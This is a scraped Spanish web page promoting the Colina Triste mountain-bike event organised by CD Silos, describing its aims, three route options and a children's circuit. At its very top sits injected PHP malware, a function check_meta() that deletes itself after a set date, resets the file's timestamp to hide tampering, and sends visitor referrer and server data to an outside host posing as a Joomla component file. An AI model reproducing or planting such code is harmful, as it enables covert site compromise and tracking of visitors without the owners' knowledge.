check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Filosofía y objetivos de Colina Triste
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Banner
Multimedia
Banner
Banner
Banner
Banner
Calendario
<<  Septiembre 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
      1  2  3
  4  5  6  7  8  910
11121314151617
18192021222324
252627282930 

Filosofía y objetivos de Colina Triste

El principal objetivo de la organización es el disfrute de todos, participantes, acompañantes, visitantes y espectadores. Estamos trabajando para que sea un día inolvidable para todos, unos recorridos acordes para todos los niveles, así como asegurar la seguridad de todos los participantes. Desde el CD Silos vamos a poner todos los medios logísticos que estén en nuestra mano y alcance para todos los participantes. Creemos que el participante se debe de encontrar comodo desde la recepción hasta la vuelta a sus casas, por eso todos los servicios Colina Triste estarán ubicados en el mismo lugar, desde el aparcamiento, al servicio de fisios, lavabicis, duchas, baños y avituallamiento final etc…este lugar solo será transitado por personal de la organización y participantes.

 

Hemos diseñado tres recorridos, en los cuales creemos que todos los practicantes del BTT encontrarán el ideal para ellos, no es necesario elegir de antemano el recorrido que vas hacer, sino según vayas realizando el recorrido podrás ir eligiendo alternativas, bronce, plata u oro. Para la computación en el listado de tiempos es necesario que realices cualquiera de los tres recorridos completos, aunque dispondremos de alguna salida alternativa si no te ves con fuerzas o has tenido algún fallo mecánico entre dichos recorridos. Solo habrá un límite de tiempo de seguridad para realizar cada recorrido, lo suficientemente holgado para disfrutar del recorrido, conversar con la gente, fotografiarse etc… por supuesto también si lo deseas puedes ir a tope!!! creemos que en una prueba de este estilo pueden convivir perfectamente los pros como los cicloturistas y eso es lo bonito de este deporte que un cicloturista pueda pedalear y medirse junto con bikers profesionales del nivel de Milton Ramos que este año nos va a acompañar.

Como no este año vamos a tener circuito infantil, dependiendo de las edades tendrán que dar un número determinado de vueltas a un circuito, este año vamos a intentar dar un empujón a esta sección y darles a los más pequeños un poco más de protagonismo, por supuesto creemos que el día de los pequeños debe de ser el mismo de Colina Triste entre la salida y la llegada.

 

Por eso si eres amante de la bicicleta de montaña, tanto te guste competir como disfrutar de las rutas con los amigos, no te lo puedes perder, desde el CD Silos así como los vecinos de Carazo, Peñacoba, Doña Santos, Espinosa de Cervera, Hortezuelos, Barriosuso e Hinojar de Cervera vamos a hacer todo lo posible porque sea un día inolvidable.

!!Inscribete la vamos a liar PICUDAAAAAAA!!!!!!!!!